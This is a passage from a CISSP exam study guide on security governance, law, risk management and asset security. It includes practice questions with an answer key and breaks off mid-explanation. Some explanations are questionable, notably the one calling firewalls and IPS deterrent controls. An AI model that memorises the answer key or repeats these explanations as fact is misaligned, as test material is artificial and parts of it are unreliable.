An example of religious law is Sharia (Islamic law), which use the Qur’an and Hadith for the foundation of laws. Customary law takes common, local and accepted practices and sometimes makes them laws. Within common law, you have criminal law (laws against society) and civil law (typically person vs. person and results in a monetary compensation from the losing party). Compliance factors into laws, regulations, and industry standards such as Sarbanes-Oxley (SOX), the Gramm-Leach-Bliley Act (GLBA), the Payment Card Industry Data Security Standard (PCI DSS), the Health Insurance Portability and Accountability Act (HIPAA), and the Federal Information Security Management Act (FISMA). As part of your exam preparation, familiarize yourself with these standards by reading their high-level summaries.  Privacy requirements. Privacy is about protection of PII. Laws vary. The European Union has tough laws around privacy. Be familiar with the General Data Protection Regulation (GDPR). Be familiar with the requirements around healthcare data, credit card data and other PII data as it relates to various countries and their laws and regulations. 1.4 Understand legal and regulatory issues that pertain to information security in a global context While you might be familiar with your local legal and regulatory issues, you must be familiar with legal and regulatory issues elsewhere too, at least at a high level.  Cyber crimes and data breaches. Before your organization expands to other countries, perform due diligence to understand their legal systems and what changes might be required to the way that data is handled and secured. In particular, be familiar with the Council of Europe Convention on Cybercrime, a treaty signed by many countries that establishes standards for cybercrime policy. Be familiar with the various laws about data breaches, including notification requirements. In the United States, the Health Information Technology for Economic and Clinical Health (HITECH) Act requires notification of a data breach in some cases, such as when the exposed personal health information was not protected in accordance with the Health Insurance Portability and Accountability Act (HIPAA). The Gramm-Leach-Bliley Act (GLBA) applies to insurance and financial organizations; it requires notification to federal regulators, law enforcement agencies and customers when a data breach occurs. States in the United States also impose their own requirements concerning data breaches. The EU and other countries have their own requirements too. The GDPR has very strict data breach notification requirements: A data breach must be reported to the competent supervisory authority within 72 hours of its discovery. Some countries do not have any reporting requirements.  Licensing and intellectual property requirements. Understand the rules around: 11  Trademarks —A logo, symbol or mascot used for marketing a brand  Patents — A temporary monopoly for producing a specific item such as a toy, which must be novel and unique to qualify for a patent  Copyright — Exclusive use of artistic, musical or literary works that prevents unauthorized duplication, distribution or modification)  Licensing — A contract between the software producer and the consumer that limits the use and/or distribution of the software  Import/export controls. Every country has laws around the import and export of hardware and software. For example, the United States has restrictions around the export of cryptographic technology, and Russia requires a license to import encryption technologies manufactured outside the country.  Trans-border data flow. If your organization adheres to specific security laws and regulations, then you should adhere to them no matter where the data resides — for example, even if you store a second copy of your data in another country. Be aware of the applicable laws in all countries where you store data and maintain computer systems. In some cases, data might need to remain in the country. In other cases, you need to be careful with your data because the technical teams might be unaware of the security and compliance requirements. The EU-US Privacy Shield (formerly the EU-US Safe Harbor agreement) controls data flow from the EU to the United States. The EU has more stringent privacy protections and without the Safe Harbor act, personal data flow from the EU to the United States would not be allowed.  Privacy. Many laws include privacy protections for personal data. The new GDPR has strong privacy rules that apply to any organization anywhere that stores or processes the personal data of EU citizens; in particular, individuals must be told how their data is collected and used, and they must be able to opt out. The privacy guidelines of the Organization for Economic Co-operation and Development (OECD) require organizations to avoid unjustified obstacles to trans-border data flow, limit personal data collection, protect personal data with reasonable security, and more. 1.5 Understand, adhere to, and promote professional ethics As a CISSP, you must understand and follow the (ISC)² code of ethics, as well as your organization’s own code.  (ISC)² Code of Professional Ethics. Take the time to read the code of ethics available at www.isc2.org/Ethics. At a minimum, know and understand the ethics canons:  Protect society, the common good, necessary public trust and confidence, and the infrastructure. This is “do the right thing.” Put the common good ahead of yourself. Ensure that the public can have faith in your infrastructure and security.  Act honorably, honestly, justly, responsibly, and legally. Always follow the laws. But what if you find yourself working on a project where conflicting laws from different countries or jurisdictions apply? In such a case, you should prioritize the local jurisdiction from which you are performing the services.  Provide diligent and competent service to principles. Avoid passing yourself as an expert or as qualified in areas that you aren’t. Maintain and expand your skills to provide competent services. 12  Advance and protect the profession. Don’t bring negative publicity to the profession. Provide competent services, get training and act honorably. Think of it like this: If you follow the first three canons in the code of ethics, you automatically comply with this one.  Organizational code of ethics. You must also support ethics at your organization. This can be interpreted to mean evangelizing ethics throughout the organization, providing documentation and training around ethics, or looking for ways to enhance the existing organizational ethics. Some organizations might have slightly different ethics than others, so be sure to familiarize yourself with your organization’s ethics and guidelines. 1.6 Develop, document, and implement security policy, standards, procedures and guidelines Develop clear security policy documentation, including the following:  Policy. This is the high-level document, often written by the management team. Policy is mandatory. It is purposely vague. For example, a policy might require you to ensure the confidentiality of company data but not specify the method for doing so.  Standards. These are more descriptive than policies and document the standards to be used by the company for things such as hardware and software. For example, an organization might standardize on virtual machines and not physical servers.  Procedures. These are the step-by-step documents that detail how to perform specific tasks, such as how to restore a database. The person following the procedure uses the document to perform the task. Procedures are mandatory. If you have a procedure for restoring a database, then that procedure needs to be followed for every database restore.  Guidelines. These are recommended but optional. For example, your organization might have a guideline that recommends storing passwords in an encrypted password vault. It is a good idea to do that. But somebody might choose to store passwords in their brain or using another secure storage mechanism.  Baselines. Although baselines are not explicitly mentioned in this section of the exam, don’t forget about them. Baselines automate implementation of your standards, thereby ensuring adherence to them. For example, if you have 152 configuration items for your server builds, you can configure all of them in a baseline that is applied to every server that is built. Group Policy objects (GPOs) are often used to comply with standards in a Windows network. Configuration management solutions can also help you establish baselines and spot configurations that drift away from them. 1.7 Identify, analyze, and prioritize Business Continuity (BC) requirements Business continuity is the goal of remaining fully operational during an outage. ISO/IEC 27031 covers business continuity in detail (it provides a framework to build on, along with methods and processes covering the entire subject). Business continuity requires a lot of planning and preparation. The actual implementation of business continuity processes occurs quite infrequently. The primary facets of business continuity are resilience (within a data center and between sites or data 13 centers), recovery (if a service becomes unavailable, you need to recover it as soon as possible), and contingency (a last resort in case resilience and recovery prove ineffective).  Develop and document scope and plan. Developing the project scope and plan starts with gaining support of the management team, making a business case (cost/benefit analysis, regulatory or compliance reasons, etc.), and ultimately gaining approval to move forward. Next, you need to form a team with representatives from the business as well as IT. Then you are ready to begin developing the plan. Start with a business continuity policy statement, then conduct a business impact analysis (as explained in the next bullet), and then develop the remaining components: preventive controls, relocation, the actual continuity plan, testing, training and maintenance). Be familiar with the difference between business continuity (resuming critical functions without regard for the site) and disaster recovery (recovering critical functions at the primary site, when possible).  Conduct a business impact analysis (BIA). Identify the systems and services that the business relies on and figure out the impacts that a disruption or outage would cause, including the impacts on business processes like accounts receivable and sales. You also need to figure out which systems and services you need to get things running again (think foundational IT services such as the network and directory, which many other systems rely on). Be sure to prioritize the order in which critical systems and services are recovered or brought back online. As part of the BIA, you will establish the recovery time objectives (RTOs) (how long it takes to recover), the recovery point objectives (RPOs) (the maximum tolerable data loss), and maximum tolerable downtime (MTD), along with the costs of downtime and recovery. 1.8 Contribute to and enforce personnel security policies and procedures In many organizations, the number one risk to the IT environment is people. And it’s not just IT staff, but anyone who has access to the network. Malicious actors routinely target users with phishing and spear phishing campaigns, social engineering, and other types of attacks. Everybody is a target. And once attackers compromise an account, they can use that entry point to move around the network and elevate their privileges. The following strategies can reduce your risk:  Candidate screening and hiring. Screening candidates thoroughly is a critical part of the hiring process. Be sure to conduct a full background check that includes a criminal records check, job history verification, education verification, certification validation and confirmation of other accolades when possible. Additionally, contact all references.  Employment agreements and policies. An employment agreement specifies job duties, expectations, rate of pay, benefits and information about termination. Sometimes, such agreements are for a set period (for example, in a contract or short-term job). Employment agreements facilitate termination when needed for an underperforming employee. The more information and detail in an employment agreement, the less risk (risk of a wrongful termination lawsuit, for example) the company has during a termination proceeding. For instance, a terminated employee might take a copy of their email with them without thinking of it as stealing, but they are less likely to do so if an employment agreement or another policy document clearly prohibits it.  Onboarding and termination processes. Onboarding comprises all the processes tied to a new employee starting at your organization. Having a documented process in place enables new employees to be integrated as quickly and consistently as possible, which reduces risk. For example, if you have five IT admins performing the various onboarding processes, you might get different results each time if you don’t have the processes 14 standardized and documented; a new hire might end up with more access than required for their job. Termination is sometimes a cordial process, such as when a worker retires after 30 years. Other times, it can be a high-stress situation, such as when a person is being terminated unexpectedly. You need to have documented policies and procedures to handle all termination processes. The goal is to have a procedure to immediately revoke all access to all company resources. In a perfect world, you would push one button and all access would be revoked immediately.  Vendor, consultant, and contractor agreements and controls. When workers who are not full-time employees have access to your network and data, you must take extra precautions. Consultants often work with multiple customers simultaneously, so you need to have safeguards in place to ensure that your company’s data isn’t mixed in with data from other organizations, or accidentally or deliberately transmitted to unauthorized people. In highsecurity organizations, it is common to have the organization issue a computing device to consultants and enable the consultant to access the network and data only through that device. Beyond the technical safeguards, you must also have a way to identify consultants, vendors and contractors. For example, maybe they have a different security badge than regular full-time employees. Perhaps they sit in the same area or their display names in the directory call out their status.  Compliance policy requirements. Organizations have to adhere to different compliance mandates, depending on their industry, country and other factors. All of them need to maintain documentation about their policies and procedures for meeting those requirements. Employees should be trained on the company’s compliance mandates at a high level upon hire and regularly thereafter (such as re-certifying once a year).  Privacy policy requirements. Personally identifiable information about employees, partners, contractors, customers and other people should be stored in a secure way, accessible only to those who require the information to perform their jobs. For example, somebody in the Payroll department might need access to an employee’s banking information to have their pay automatically deposited, but no one else should be able to access that data. Organizations should maintain a documented privacy policy that outlines the types of data covered by the policy and who the policy applies to. Employees, contractors and anyone else who might have access to the data should be required to read and agree to the privacy policy upon hire and on a regular basis thereafter (such as annually). 1.9 Understand and apply risk management concepts Risk management involves three primary steps: identify threats and vulnerabilities, assess the risk (risk assessment), and choose whether and how to respond (often the choice is risk mitigation). As part of managing overall risk, the IT team strives to secure the IT environment, provide information to the management teams so that they can make informed decisions, and enable the management team to sign off on the IT environment based on the goals and requirements. Risk management also has a financial component: The management team must balance the risk with the budget. In a perfect world, the company would spend the minimum amount of money and time to minimize risk to an acceptable level for the organization.  Identify threats and vulnerabilities. Threats and vulnerabilities are linked. A threat (such as a hacker taking over a client computer) is possible when a vulnerability (such as an unpatched client computer) is present. That is a known threat. But unknown threats also exist, such as when a hacker is aware of a bug that nobody else knows about in your anti-virus software and can remotely compromise your computer. 15  Assess risk. You have a risk when you have a threat and a vulnerability. In those cases, you need to figure out the chances of the threat exploiting the vulnerability and the consequences if that does happen. Be familiar with the approaches:  Qualitative. This method uses a risk analysis matrix and assigns a risk value such as low, medium or high. For example, if the likelihood is rare and the consequences are low, then the risk is low. If the likelihood is almost certain and the consequences are major, then the risk is extreme.  Quantitative. This method is more objective than the qualitative method; it uses dollars or other metrics to quantify risk.  Hybrid. A mix of qualitative and quantitative. If you can easily assign a dollar amount, you do; if not, you don’t. This can often provide a good balance between qualitative and quantitative.  Respond to risk. You must formulate a plan of action for each risk you identify. For a given risk, you can choose risk mitigation (reduce the risk), risk assignment (assign the risk to a team or provider for action), risk acceptance (accept the risk) or risk rejection (ignore the risk). Outside of the three primary steps for applying risk management, you should familiarize yourself with some of the details for those three steps:  Countermeasure selection and implementation. You can use a software or hardware solution to reduce a particular risk by implementing a countermeasure, sometimes referred to as a “control” or a “safeguard.” Suppose you have a password policy that a legacy application cannot technically meet (for example, the app is limited to 10 characters for the password). To reduce the likelihood of that password being compromised, you can implement any of several countermeasures: For instance, you can require that the password be changed more frequently than other (longer) passwords, or mandate that the password be stored in a secure password vault that requires twofactor authentication. For your exam preparation, don’t just understand the words and definitions; understand how you implement the concepts in your environment. You don’t have to provide a step-by-step technical configuration, but you must understand the implementation process — where you start, the order of the steps you take and how you finish.  Applicable types of controls. Be familiar with the 6 types of controls:  Preventive. This type of control is intended to prevent a security incident from happening. For example, you add an anti-virus product to your computers.  Detective. This type of control is used to identify the details of a security incident, including (sometimes) the attacker.  Corrective. A corrective control implements a fix after a security incident occurs.  Deterrent. This type of control attempts to discourage attackers. For example, you lock your office whenever you leave for lunch or go home for the day.  Recovery. A recovery control tries to get the environment back to where it was prior to a security incident.  Compensating. A compensating control is an alternative control to reduce a risk. Suppose you need to enable outside users to get to your SharePoint site, which resides on your local area network. Instead of 16 opening the firewall to permit communication from the internet to your internal SharePoint servers, you can implement a compensating control, such as deploying a reverse proxy to the perimeter network and enabling SharePoint external access through the reverse proxy. In the end, the functionality is typically the same, but the method of getting there is different.  Security Control Assessment (SCA). You need to periodically assess your security controls. What’s working? What isn’t working? As part of this assessment, the existing document must be thoroughly reviewed, and some of the controls must be tested at random. A report is typically produced to show the outcomes and enable the organization to remediate deficiencies.  Monitoring and measurement. Monitoring and measurement are closely aligned with identifying risks. For example, if there are many invalid database query attempts coming from your web server, it might indicate an attack. At a minimum, it is worth investigating. Whether action is required will depend. Without the proper monitoring in place, you won’t know about these types of events. You might not know when a person is probing your network. Even if you are capturing monitoring information, it isn’t enough by itself. You also need a way to measure it. For example, if your monitoring shows 500 invalid logon attempts on your web server today, is that a cause for concern? Or is that typical because you have 75,000 users? While monitoring is used for more than security purposes, you need to tune it to ensure you are notified about potential security incidents as soon as possible. In some cases, it will be too late and a data breach might occur. That’s when the monitoring data becomes valuable from a forensics perspective. You need to be able to look back at the data and figure out why you didn’t see anything during the incident and what adjustments you need to make to minimize the chances of it happening again.  Asset valuation. When you think of assets, don’t just think of physical assets such as computers and office furniture (tangible assets). Assets also include the company’s data and intellectual property (intangible assets). While tangible assets are easy to assess for value (for example, you bought the disk drive for $250), data and intellectual property can be harder to place a value on. Be familiar with the following strategies of intangible asset valuation:  Cost approach. How much would it cost to replace the asset?  Income approach. How much income will the asset produce over its lifetime?  Market approach. How much does a similar asset cost?  Quantitative approach. Assigns a dollar value to assess risk.  Qualitative approach. Assigns a score to assess risk.  Reporting. One of the foundations of an enterprise-grade security solution is the ability to report on your environment (what you have, what the top risks are, what’s happening right now, what happened 3 days ago, etc.). Reporting provides information. And that information is sometimes used to start a continuous improvement process.  Continuous improvement. Continuous improvement is an ongoing, never-ending effort to take what you have and improve it. Often, improvements are small and incremental. However, over time, small improvements can add up. Continuous improvement can be applied to products (for example, upgrading to the latest version), services 17 (for example, expanding your internal phishing testing) or processes (for example, automating processes to save time and improve consistency).  Risk frameworks. A risk framework documents how your organization handles risk assessment, risk resolution and ongoing monitoring. See http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-37r1.pdf for an example of a risk framework. There are other risk frameworks, such as the British Standard BS 31100. Be familiar with risk frameworks and their goals. The NIST framework identifies the following steps: categorize, select, implement, assess, authorize and monitor. 1.10 Understand and apply threat modeling concepts and methodologies When you perform threat modeling for your organization, you document potential threats and prioritize those threats (often by putting yourself in an attacker’s mindset). There are four well-known methods. STRIDE, introduced at Microsoft in 1999, focuses on spoofing of user identity, tampering, repudiation, information disclosure, denial of service and elevation of privilege. PASTA (process for attack simulation and threat analysis) provides dynamic threat identification, enumeration and scoring. Trike uses threat models based on a requirements model. VAST (visual, agile and simple threat modeling) applies across IT infrastructure and software development without requiring security experts.  Threat modeling methodologies. Part of the job of the security team is to identify threats. You can identify threats using different methods:  Focus on attackers. This is a useful method in specific situations. For example, suppose that a developer’s employment is terminated. After extracting data from the developer’s computer, you determine that the person was disgruntled and angry at the management team. You now know this person is a threat and can focus on what he or she might want to achieve. However, outside of specific situations like this, organizations are usually not familiar with their attackers.  Focus on assets. Your organization’s most valuable assets are likely to be targeted by attackers. For example, if you have a large number of databases, the database with the HR and employee information might be the most sought after.  Focus on software. Many organizations develop applications in house, either for their own use or for customer use. You can look at your software as part of your threat identification efforts. The goal isn’t to identify every possible attack, but instead to focus on the big picture, such as whether the applications are susceptible to DoS or information disclosure attacks.  Threat modeling concepts. If you understand the threats to your organization, then you are ready to document the potential attack vectors. You can use diagramming to list the various technologies under threat. For example, suppose you have a SharePoint server that stores confidential information and is therefore a potential target. You can diagram the environment integrating with SharePoint. You might list the edge firewalls, the reverse proxy in the perimeter network, the SharePoint servers in the farm and the database servers. Separately, you might have a diagram showing SharePoint’s integration with Active Directory and other applications. You can use these diagrams to identify attack vectors against the various technologies. 18 1.11 Apply risk-based management concepts to the supply chain Organizations must use risk-based management concepts when they contract out tasks (such as hiring an air conditioning company to maintain the air conditioning in their data centers), bring on new suppliers or utilize service companies to transport their goods. Many of these concepts apply to mergers and acquisitions too.  Risks associated with hardware, software, and services. The company should perform due diligence, which includes looking at the IT infrastructure of the supplier. When thinking about the risk considerations, you must consider:  Hardware. Is the company using antiquated hardware that introduces potential availability issues? Is the company using legacy hardware that isn’t being patched by the vendor? Will there be integration issues with the hardware?  Software. Is the company using software that is out of support, or from a vendor that is no longer in business? Is the software up to date on security patches? Are there other security risks associated with the software?  Services. Does the company provide services for other companies or to end users? Is the company reliant on third-party providers for services (such as SaaS apps)? Did the company evaluate service providers in a way that enables your company to meet its requirements? Does the company provide services to your competitors? If so, does that introduce any conflicts of interest?  Third-party assessment and monitoring. Before agreeing to do business with another company, your organization needs to learn as much as it can about that company. Often, third-party assessments are used to help gather information and perform the assessment. An on-site assessment is useful to gain information about physical security and operations. During the document review, your goal is to thoroughly review all the architecture, designs, implementations, policies, procedures, etc. You need to have a good understanding of the current state of the environment, especially so you can understand any shortcomings or compliance issues prior to integrating the IT infrastructures. You need to ensure that the other company’s infrastructure meets all your company’s security and compliance requirements. The level of access and depth of information you are able to gain is often directly related to how closely your companies will work together. For example, if a company is your primary supplier of a critical hardware component, then a thorough assessment is critical. If the company is one of 3 delivery companies used to transport goods from your warehouse, then the assessment is important but does not have to be as deep.  Minimum security requirements. As part of the assessment, the minimum security requirements must be established. In some cases, the minimum security requirements are your company’s security requirements. In other cases, new minimum security requirements are established. In such scenarios, the minimum security requirements should have a defined period, such as 12 months.  Service-level requirements. A final area to review involves service level agreements (SLAs). Companies have SLAs for internal operations (such as how long it takes for the helpdesk to respond to a new ticket), for customers (such as the availability of a public-facing service), and for partner organizations (such as how much support a vendor provides a partner). All the SLAs of the company should be reviewed. Your company sometimes has an SLA standard that should be applied, when possible, to the SLAs as part of working with another company. This can 19 sometimes take time, as the acquiring company might have to support established SLAs until they expire or renewal comes up. 1.12 Establish and maintain a security awareness, education, and training program This section of the exam covers all the aspects of ensuring that everybody in your organization is security conscious and familiar with the organization’s policies and procedures. In general, it is most effective to start with an awareness campaign and then provide detailed training. For example, teaching everybody about malware or phishing campaigns before they understand the bigger picture of risk isn’t very effective.  Methods and techniques to present awareness and training. While the information security team is typically well-versed on security, the rest of the organization often isn’t. As part of having a well-rounded security program, the organization must provide security education, training and awareness to the entire staff. Employees need to understand what to be aware of (types of threats, such as phishing or free USB sticks), understand how to perform their jobs securely (encrypt sensitive data, physically protect valuable assets), and how security plays a role in the big picture (company reputation, profits and losses). Training should be mandatory and provided both to new employees and yearly (at a minimum) for ongoing training. Routine tests of operational security should be performed (such as tailgating at company doors and social engineering tests like phishing campaigns).  Periodic content reviews. Threats are complex and the training needs to be relevant and interesting to be effective. This means updating training materials and awareness training, and changing out the ways which security is tested and measured. If you always use the same phishing test campaign or send it from the same account on the same day of the year, it isn’t effective. The same applies to other material. Instead of relying on long and detailed security documentation for training and awareness, consider using internal social media tools, videos and interactive campaigns.  Program effectiveness evaluation. Time and money must be allocated for evaluating the company’s security awareness and training. The company should track key metrics, such as the percentage of employees clicking on a link in a test phishing email. Is the awareness and training bringing the total number of clicks down? If so, the program is effective. If not, you need to re-evaluate it. 20 Domain 1 Review Questions Read and answer the following questions. If you do not get at least one of them correct, spend more time with the subject. Then move on to Domain 2. 1. You are a security consultant. A large enterprise customer hires you to ensure that their security operations are following industry standard control frameworks. For this project, the customer wants you to focus on technology solutions that will discourage malicious activities. Which type of control framework should you focus on? a. Preventative b. Deterrent c. Detective d. Corrective e. Assessment 2. You are performing a risk analysis for an internet service provider (ISP) that has thousands of customers on its broadband network. Over the past 5 years, some customers have been compromised or experienced data breaches. The ISP has a large amount of monitoring and log data for all customers. You need to figure out the chances of additional customers experiencing a security incident based on that data. Which type of approach should you use for the risk analysis? a. Qualitative b. Quantitative c. STRIDE d. Reduction e. Market 3. You are working on a business continuity project for a company that generates a large amount of content each day for use in social networks. Your team establishes 4 hours as the maximum tolerable data loss in a disaster recovery or business continuity event. In which part of the business continuity plan should you document this? a. Recovery time objective (RTO) b. Recovery point objective (RPO) c. Maximum tolerable downtime (MTD) d. Maximum data tolerance (MDT) 21 Answers to Domain 1 Review Questions 1. Answer: B Explanation: Deterrent frameworks are technology-related and used to discourage malicious activities. For example, an intrusion prevention system or a firewall would be appropriate in this framework. There are three other primary control frameworks. A preventative framework helps establish security policies and security awareness training. A detective framework is focused on finding unauthorized activity in your environment after a security incident. A corrective framework focuses on activities to get your environment back after a security incident. There isn’t an assessment framework. 2. Answer: B Explanation: You have three risk analysis methods to choose from: qualitative (which uses a risk analysis matrix), quantitative (which uses money or metrics to compute), or hybrid (a combination of qualitative and quantitative but not an answer choice in this scenario). Because the ISP has monitoring and log data, you should use a quantitative approach; it will help quantify the chances of additional customers experiencing a security risk. STRIDE is used for threat modeling. A market approach is used for asset valuation. A reduction analysis attempts to eliminate duplicate analysis and is tied to threat modeling. 3. Answer: B Explanation: The RTO establishes the maximum amount of time the organization will be down (or how long it takes to recover), the RPO establishes the maximum data loss that is tolerable, the MTD covers the maximum tolerable downtime, and MDT is just a made-up phrase used as a distraction. In this scenario, with the focus on the data loss, the correct answer is RPO. 22 Domain 2. Asset Security When we think about assets, some people consider only physical assets, such as buildings, land and computers. But asset security for the CISSP exam focuses on virtual assets such as intellectual property and data. (In Domain 3, there will be some physical security topics.) 2.1 Identify and classify information and assets To improve security, you need to identify both your data and your physical assets and classify them according to their importance or sensitivity, so you can specify procedures for handling them appropriately based on their classification.  Data classification. Organizations classify their data using labels. You might be familiar with two government classification labels, Secret and Top Secret. Non-government organizations generally use classification labels such as Public, Internal Use Only, Partner Use Only, or Company Confidential. However, data classification can be more granular; for example, you might label certain information as HR Only.  Asset classification. You also need to identify and classify physical assets, such as computers, smartphones, desks and company cars. Unlike data, assets are typically identified and classified by asset type. Often, asset classification is used for accounting purposes, but it can also be tied to information security. For example, an organization might designate a set of special laptops with particular software installed, and assign them to employees when they travel to high-risk destinations, so their day-to-day assets can remain safely at home. Classification labels help users disseminate data and assets properly. For example, if Sue has a document classified as Partner Use Only, she knows that it can be distributed only to partners; any further distribution is a violation of security policy. In addition, some data loss prevention solutions can use classification data to help protect company data automatically. For example, an email server can prevent documents classified as Internal Use Only from being sent outside of the organization. People with the right clearance can view certain classifications of data or check out certain types of company equipment (such as a company truck). While clearance is often associated with governments or the military, it is also useful for organizations. Some organizations use it routinely throughout their environments, while other organizations use it for special scenarios, such as a merger or acquisition. When studying for this section, concentrate on understanding the following concepts:  Clearance. Clearance dictates who has access to what. Generally, a certain clearance provides access to a certain classification of data or certain types of equipment. For example, Secret clearance gives access to Secret documents, and a law enforcement organization might require a particular clearance level for use of heavy weaponry.  Formal access approval. Whenever a user needs to gain access to data or assets that they don’t currently have access to, there should be a formal approval process. The process should involve approval from the data owner, who should be provided with details about the access being requested. Before a user is granted access to the data, they should be told the rules and limits of working with it. For example, they should be aware that they must not send documents outside the organization if they are classified as Internal Only. 23  Need to know. Suppose your company is acquiring another company but it hasn’t been announced yet. The CIO, who is aware of the acquisition, needs to have IT staff review some redacted network diagrams as part of the due diligence process. In such a scenario, the IT staff is given only the information they need to know (for example, that it is a network layout and the company is interested in its compatibility with its own network). The IT staff do not need to know about the acquisition at that time. This is “need to know.” 2.2 Determine and maintain information and asset ownership If you don’t know who owns a piece of data, how can you go through a formal access approval process? You can’t, at least not as effectively. Similarly, you can’t properly account for assets if you don’t know which department owns them, or assign the right type of laptop for high-risk travel if you don’t have the assets classified. Data owners are responsible for classifying the data they own. In larger companies, an asset management department handles asset classification. A custodian is a hands-on role that implements and operates solutions for data (e.g., backups and restores). A system owner is responsible for the computer environment (hardware, software) that houses data; this is typically a management role with operational tasks handed off to the custodian. 2.3 Protect privacy All workers need to be aware of the company’s privacy policies and procedures and know how to contact data owners in the event of an issue. Key terms to understand include the following:  Data owners. Data owners are usually members of the management or senior management team. They approve access to data (usually by approving the data access policies that are used day to day).  Data processors. Data processors are the users who read and edit the data regularly. Users must clearly understand their responsibilities with data based on its classification. Can they share it? What happens if they accidentally lose it or destroy it?  Data remanence. Data remanence occurs when data is deleted but remains recoverable. Whenever you delete a file, the operating system marks the space the file took up as available. But the data is still there, and with freely downloadable tools, you can easily extract that data. Organizations need to account for data remanence to ensure they are protecting their data. There are a few options:  Secure deletion or overwriting of data. You can use a tool to overwrite the space that a file was using with random 1s and 0s, either in one pass or in multiple passes. The more passes you use, the less likely it is that the data can be recovered.  Destroying the media. You can shred disk drives, smash them into tiny pieces, or use other means to physically destroy them. This is effective but renders the media unusable thereafter.  Degaussing. Degaussing relies on the removal or reduction of magnetic fields on the disk drives. It is very effective and complies with many government requirements for data remanence. 24  Collection limitation. Security often focuses on protecting the data you already have. But part of data protection is limiting how much data your organization collects. For example, if you collect users’ birthdates or identification card numbers, you then must protect that data. If your organization doesn’t need the data, it shouldn’t collect it. Many countries are enacting laws and regulations to limit the collection of data. But many organizations are unaware and continue to collect vast amounts of sensitive data. You should have a privacy policy that specifies what information is collected, how it is used and other pertinent details. 2.4 Ensure appropriate asset retention There are two aspects to data retention: You should ensure that your organization holds data for as long as required — and also that it securely deletes data that is no longer required, in order to reduce the risk of its exposure. To determine how long to keep certain data, you need to consider both whether the data is still useful to your organization and whether there are any regulations, legal reasons or company policies requiring its retention. In many cases, a company must keep data for longer than the data provides value; for example, your organization might have a policy to retain email data for 7 years regardless of its value. As part of your comprehensive security policies, you should ensure the destruction of unneeded data. Besides data, this section also covers the hardware and personnel required to use the data. These are quite important.  Hardware. Even if you maintain data for the appropriate retention period, it won’t do you any good if you don’t have hardware that can read the data. For example, if you have data on backup tapes and hold them for 10 years, you run the risk of not being able to read the tapes toward the end of the retention period because tape hardware changes every few years. Thus, you must ensure you have the hardware and related software (tape drives, media readers and so on) needed to get to the data that you are saving.  Personnel. Suppose your company is retaining data for the required time periods and maintaining hardware to read the data. But what happens if the only person who knew how to operate your tape drives and restore data from them no longer works at the company, and the new team is only familiar with disk-to-disk backup? You might not be able to get to your data! By documenting all the procedures and architecture, you can minimize this risk. 2.5 Determine data security controls You need data security controls that protect your data as it is stored, used and transmitted.  Understanding data states. The industry identifies three data states:  Data at rest is data stored on a storage medium (disk, tape, etc.).  Data in motion is data moving from a source (such as a computer) to a destination (such as another computer).  Data in use is data that is actively being worked on (for example, a person editing a spreadsheet).  Scoping and tailoring. Scoping is the process of finalizing which controls are in scope and which are out of scope (not applicable). Tailoring is the process of customizing the implementation of controls for an organization. 25  Standards selection. Standards selection is the process by which organizations plan, choose and document technologies and/or architectures for implementation. For example, you might evaluate three vendors for an edge firewall solution. You could use a standards selection process to help determine which solution best fits the organization. Vendor selection is closely related to standards selection but focuses on the vendors, not the technologies or solutions. The overall goal is to have an objective and measurable selection process. If you repeat the process with a totally different team, then they should come up with the same selection as the first team. In such a scenario, you would know that your selection process is working as expected.  Data protection methods. The options for protecting data depend on its state:  Data at rest. You can encrypt data at rest. You should consider encryption for operating system volumes and data volumes, and you should encrypt backups, too. Be sure to consider all locations for data at rest, such as tapes, USB drives, external drives, RAID arrays, SAN, NAS and optical media.  Data in motion. Data is in motion when it is being transferred from one place to another. Sometimes, it is moving from your local area network to the internet, but it can also be internal to your network, such as from a server to a client computer. You can encrypt data in motion to protect it. For example, a web server uses a certificate to encrypt data being viewed by a user, and you can use IPsec to encrypt communications. There are many options. The most important point is to use encryption whenever possible, including for internal-only web sites available only to workers connected to your local area network.  Data in use. Data in use is often in memory because it is being used by, say, a developer working on some code updates or a user running reports on company sales. The data must be available to the relevant applications and operating system functions. There are some third-party solutions for encrypting data in memory, but the selection is limited. In addition to keeping the latest patches deployed to all computing devices, maintaining a standard computer build process, and running anti-virus and anti-malware software, organizations often use strong authentication, monitoring and logging to protect data in use. 2.6 Establish information and asset handling requirements This section covers how people and systems work with data. This includes any action you can take with the data, such as read, copy, edit or delete. The key subtopics are important to know:  Markings and labels. You should mark data to ensure that users are following the proper handling requirements. The data could be printouts or media like disks or backup tapes. For example, if your employee review process is on paper, the documents should be labeled as sensitive, so that anyone who stumbles across them accidentally will know not to read them but turn them over to the data owner or a member of the management or security team. You also might restrict the movement of confidential data, such as backup tapes, to certain personnel or to certain areas of your facility. Without labels, the backup tapes might not be handled in accordance with company requirements.  Storage. You can store data in many ways, including on paper, disk or tape. For each scenario, you must define the acceptable storage locations and inform users about those locations. It is common to provide a vault or safe for backup tapes stored on premises, for example. Personnel who deal with sensitive papers should have a locked 26 cabinet or similar secure storage for those documents. Users should have a place to securely store files, such as an encrypted volume or an encrypted shared folder.  Destruction. Your organization should have a policy for destruction of sensitive data. The policy should cover all the mediums that your organization uses for storing data — paper, disk, tape, etc. Some data classifications, such as those that deal with sensitive or confidential information, should require the most secure form of data destruction, such as physical destruction or secure data deletion with multiple overwrite passes. Other classifications might require only a single overwrite pass. The most important thing is to document the requirement for the various forms of media and the classification levels. When in doubt, destroy data as though it were classified as the most sensitive data at your organization. 27 Domain 2 Review Questions Read and answer the following questions. If you do not get at least one correct, then spend more time with the subject. Then move on to Domain 3. 1. You are performing a security audit for a customer. During the audit, you find several instances of users gaining access to data without going through a formal access approval process. As part of the remediation, you recommend establishing a formal access approval process. Which role should you list to approve policies that dictate which users can gain access to data? a. Data creator b. Data processor c. Data custodian d. Data owner e. System owner 2. Your organization has a goal to maximize the protection of organizational data. You need to recommend 3 methods to minimize data remanence in the organization. Which 3 of the following methods should you recommend? a. Formatting volumes b. Overwriting of data c. Data encryption d. Degaussing e. Physical destruction 3. You are preparing to build a hybrid cloud environment for your organization. Three vendors present their proposed solution. Which methodology should your team use to select the best solution? a. Standards selection b. Standards deviation c. Vendor screening d. Vendor reviewing 28 Answers to Domain 2 Review Questions 1. Answer: D Explanation: Each data owner is responsible for approving access to data that they own. This is typically handled via approving data access policies that are then implemented by the operations team. As part of a formal access approval process, a data owner should be the ultimate person responsible for the data access. 2. Answer: B, D, E Explanation: When you perform a typical operating system deletion, the data remains on the media but the space on the media is marked as available. Thus, the data is often recoverable. There are 3 established methods for preventing data recovery: overwriting the data (sometimes referred to as a “secure 